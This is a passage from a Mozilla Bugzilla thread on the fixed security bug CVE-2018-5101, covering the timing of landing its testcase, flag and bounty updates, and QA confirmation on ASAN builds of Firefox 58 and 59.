Do you know when should / could I land the testcase?
Flags: needinfo?(abillings)
|
|
||
Comment 17•7 years ago
|
||
(In reply to Emilio Cobos Álvarez [:emilio] from comment #16)
> Do you know when should / could I land the testcase?
Not until at least a month until after this ships as a fix in a public release. I'd suggest marking in-testsuite? as a reminder.
Flags: needinfo?(abillings)
|
|
Assignee | |
Updated•7 years ago
|
Flags: in-testsuite?
|
|
||
Updated•7 years ago
|
Whiteboard: [adv-main58+]
|
|
||
Updated•7 years ago
|
Alias: CVE-2018-5101
|
|
||
Comment 18•7 years ago
|
||
Comment on attachment 8929222 [details] [diff] [review]
0001-Bug-1417661-Use-the-correct-parent-style-for-inherit.patch
As m-r is 58 now, remove approval‑mozilla‑release flag.
Attachment #8929222 -
Flags: approval-mozilla-release?
|
||
Updated•7 years ago
|
Flags: qe-verify+
Whiteboard: [adv-main58+] → [adv-main58+][post-critsmash-triage]
|
|
||
Updated•7 years ago
|
Flags: sec-bounty?
|
||
Comment 19•7 years ago
|
||
I managed to reproduce the initial issue on the ASAN build that was mentioned in comment 0. I can confirm that latest ASAN builds of firefox 58 [1] and firefox 59 [2] are verified fixed using Ubuntu 16.04 x64.
[1] linux64-asan-debug (20180125025725)
[2] linux64-asan-debug (20180123132403)
Status: RESOLVED → VERIFIED
Flags: qe-verify+
|
|
||
Comment 20•7 years ago
|
||
(In reply to Emilio Cobos Álvarez [:emilio] from comment #6)
> We create the letter frame with aBlockFrame = 0x7f90e39970b0 -> float: none
Why didn't framepoisoning save us?
Flags: needinfo?(emilio)
|
|
Assignee | |
Comment 21•7 years ago
|
||
I don't remember the details of it, sorry, I'd need to debug it again :(.
IIRC this was type-confusion or just null-crash after not finding the placeholder property. But again I'd need to debug it again to be certain. Let me know if you want me to do it.
Flags: needinfo?(emilio)
|
|
||
Updated•7 years ago
|
Flags: sec-bounty? → sec-bounty+
|
|
||
Updated•6 years ago
|
Group: core-security-release
|
||
Updated•9 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•